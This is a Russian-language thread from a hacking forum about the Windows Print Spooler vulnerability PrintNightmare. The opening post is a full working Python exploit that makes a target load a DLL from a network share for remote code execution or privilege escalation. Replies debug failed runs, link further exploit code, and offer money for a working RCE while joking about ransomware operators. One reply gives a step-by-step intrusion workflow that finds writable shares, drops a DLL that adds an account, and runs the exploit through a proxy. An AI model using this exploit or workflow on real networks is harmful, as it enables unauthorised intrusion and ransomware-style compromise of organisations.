• XSS.stack #1 – первый литературный журнал от юзеров форума

Remote RCE\LPE, Windows Spooler Service, CVE-2021-34527\1675, PrintNightmare

ibenji

(L3) cache
Пользователь
Регистрация
18.06.2019
Сообщения
154
Реакции
79
Python:
#!/usr/bin/python3
from impacket.dcerpc.v5 import rprn
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.dtypes import NULL
from impacket.structure import Structure
import argparse
import sys
import time
import pathlib

#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030
class DRIVER_INFO_2_BLOB(Structure):
    structure = (
        ('cVersion','<L'),
        ('NameOffset', '<L'),
        ('EnvironmentOffset', '<L'),
        ('DriverPathOffset', '<L'),
        ('DataFileOffset', '<L'),
        ('ConfigFileOffset', '<L'),
    )

    def __init__(self, data = None):
        Structure.__init__(self, data = data)

    def fromString(self,data):
        Structure.fromString(self, data)
        self['ConfigFileArray'] = self.rawData[self['ConfigFileOffset']:self['DataFileOffset']].decode('utf-16-le')
        self['DataFileArray'] = self.rawData[self['DataFileOffset']:self['DriverPathOffset']].decode('utf-16-le')
        self['DriverPathArray'] = self.rawData[self['DriverPathOffset']:self['EnvironmentOffset']].decode('utf-16-le')
        self['EnvironmentArray'] = self.rawData[self['EnvironmentOffset']:self['NameOffset']].decode('utf-16-le')
        self['NameArray'] = self.rawData[self['NameOffset']:len(self.rawData)].decode('utf-16-le')


def connect(username, password, domain, lmhash, nthash, address, port):
    binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address)
    rpctransport = transport.DCERPCTransportFactory(binding)
    
    rpctransport.set_dport(port)
    rpctransport.setRemoteHost(address)
    
    if hasattr(rpctransport, 'set_credentials'):
        # This method exists only for selected protocol sequences.
        rpctransport.set_credentials(username, password, domain, lmhash, nthash)
    
    print("[*] Connecting to {0}".format(binding))
    try:
        dce = rpctransport.get_dce_rpc()
        dce.connect()
        dce.bind(rprn.MSRPC_UUID_RPRN)
    except:
        print("[-] Connection Failed")
        sys.exit(1)
    print("[+] Bind OK")
    return dce


def getDrivers(dce, handle=NULL):
    #get drivers
    resp = rprn.hRpcEnumPrinterDrivers(dce, pName=handle, pEnvironment="Windows x64\x00", Level=2)
    data = b''.join(resp['pDrivers'])

    #parse drivers
    blob = DRIVER_INFO_2_BLOB()
    blob.fromString(data)
    #blob.dump()
    
    return blob


def main(username, password, domain, lmhash, nthash, address, port, share):
    #connect
    dce = connect(username, password, domain, lmhash, nthash, address, port)
    #handle = "\\\\{0}\x00".format(address)
    handle = NULL

    #find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
    try:
        blob = getDrivers(dce, handle)
        pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
    except Exception as e:
        print('[-] Failed to enumerate remote pDriverPath')
        print(str(e))
        sys.exit(1)

    print("[+] pDriverPath Found {0}".format(pDriverPath))

    #build DRIVER_CONTAINER package
    container_info = rprn.DRIVER_CONTAINER()
    container_info['Level'] = 2
    container_info['DriverInfo']['tag'] = 2
    container_info['DriverInfo']['Level2']['cVersion']     = 3
    container_info['DriverInfo']['Level2']['pName']        = "1234\x00"
    container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
    container_info['DriverInfo']['Level2']['pDriverPath']  = pDriverPath + '\x00'
    container_info['DriverInfo']['Level2']['pDataFile']    = "{0}\x00".format(share)
    container_info['DriverInfo']['Level2']['pConfigFile']  = "C:\\Windows\\System32\\kernelbase.dll\x00"

    flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
    filename = share.split("\\")[-1]
    print("[*] Executing {0}".format(share))

    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
    print("[*] Stage0: {0}".format(resp['ErrorCode']))
    for i in range(1, 30):
        try:
            container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
            resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
            print("[*] Stage{0}: {1}".format(i, resp['ErrorCode']))
            if (resp['ErrorCode'] == 0):
                print("[+] Exploit Completed")
                sys.exit()
        except Exception as e:
            #print(e)
            pass


if __name__ == '__main__':
    parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-1675 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog="""
Example;
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll'
    """)
    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
    parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'')
    group = parser.add_argument_group('authentication')
    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    group = parser.add_argument_group('connection')
    group.add_argument('-target-ip', action='store', metavar="ip address",
                       help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
                            'This is useful when target is the NetBIOS name and you cannot resolve it')
    group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port",
                       help='Destination port to connect to SMB Server')

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    import re
    domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
        options.target).groups('')

    #In case the password contains '@'
    if '@' in address:
        password = password + '@' + address.rpartition('@')[0]
        address = address.rpartition('@')[2]

    if options.target_ip is None:
        options.target_ip = address

    if domain is None:
        domain = ''

    if password == '' and username != '' and options.hashes is None:
        from getpass import getpass
        password = getpass("Password:")

    if options.hashes is not None:
        lmhash, nthash = options.hashes.split(':')
    else:
        lmhash = ''
        nthash = ''

    #re-run if stage0/stageX fails
    print("[*] Try 1...")
    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
    time.sleep(10)
    print("[*] Try 2...")
    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
    time.sleep(10)
    print("[*] Try 3...")
    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)

инфа и рос https://github.com/afwu/PrintNightmare
еще один рос https://github.com/cube0x0/CVE-2021-1675

сам тестил пока что на 5 хостах, появляется ошибка 0x5 - rpc_s_access_denied. как я понял у юзера не хватает прав.
 
Как я понял надо знать пасс от учетки уязвимой машины, верно?
сам тестил пока что на 5 хостах, появляется ошибка 0x5 - rpc_s_access_denied. как я понял у юзера не хватает прав.
с smb на котором dll лежит что-то не так вроде
 
Пожалуйста, обратите внимание, что пользователь заблокирован
появляется ошибка 0x5 - rpc_s_access_denied
А где дллка лежала ? У меня ПШ сработал, Си версия хз.
 
А где дллка лежала ? У меня ПШ сработал, Си версия хз.
именно не сработал rce , а лпе все ок , дллка на диске С лежала , и на удаленном хосте пробовал, там мимик вышел новый с этой cve , буду тестить. спс, попробую ПШ версию еще
_https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210701
 
Пожалуйста, обратите внимание, что пользователь заблокирован

Официальный патч для уязвимости PrintNightmare оказался неэффективен

 
куплю рабочий rce -2k$ старт пш или длл или ехе
Я понимаю что у рансомварщиков денег жопой жуй,но вам в падлу даже зайти на гитхаб и скачать работающий ПоЦ?
Я просто уже где-то 5 подобное обьявление вижу,уже даже появляется желания продать этот самый линк на гитхаб : )
 
Я понимаю что у рансомварщиков денег жопой жуй,но вам в падлу даже зайти на гитхаб и скачать работающий ПоЦ?
Я просто уже где-то 5 подобное обьявление вижу,уже даже появляется желания продать этот самый линк на гитхаб : )
Скорее всего он платит за подробное обьяснение как его использовать в своих корыстных целях вместо того чтобы потратить свое время дабы разобраться, он хочет купить ваше потраченое время. Других обьяснений не вижу.
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Короче объясняю для дурачков что хотят это купить, можете скинуть бабки за объяснение мне я спущу их на Героин или отдам ящечке
либо можете скинуть сражу яшечке я целей буду.
Значит так

Представим ситуацию. у нас есть впн точка входа.

есть юзеры в домене но у них нигде нет прав на вход в рдп и тд

сканируем сеть и ищем открытые шары для этого юзера
находим ее заливаем туда dll свою для добавление юзера. x64ю
затем


proxychains python3 CVE-2021-1675.py mlafortune:f@stChain53@10.179.46.3 '\\10.179.46.3\Gradient\64.dll'
и все отрабатывает без этих ваших rpc и прочей шляпы.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Если dll будет лежать на другом хосте вы будете получать rpc acces короче доступ запрещен
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Я понимаю что у рансомварщиков денег жопой жуй,но вам в падлу даже зайти на гитхаб и скачать работающий ПоЦ?
Я просто уже где-то 5 подобное обьявление вижу,уже даже появляется желания продать этот самый линк на гитхаб : )
и денег у нас

нет
 
Короче объясняю для дурачков что хотят это купить, можете скинуть бабки за объяснение мне я спущу их на Героин или отдам ящечке
либо можете скинуть сражу яшечке я целей буду.
Значит так

Представим ситуацию. у нас есть впн точка входа.

есть юзеры в домене но у них нигде нет прав на вход в рдп и тд

сканируем сеть и ищем открытые шары для этого юзера
находим ее заливаем туда dll свою для добавление юзера. x64ю
затем


proxychains python3 CVE-2021-1675.py mlafortune:f@stChain53@10.179.46.3 '\\10.179.46.3\Gradient\64.dll'
и все отрабатывает без этих ваших rpc и прочей шляпы.
Спасибо тебе добрый человек)
 
Пожалуйста, обратите внимание, что пользователь заблокирован


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх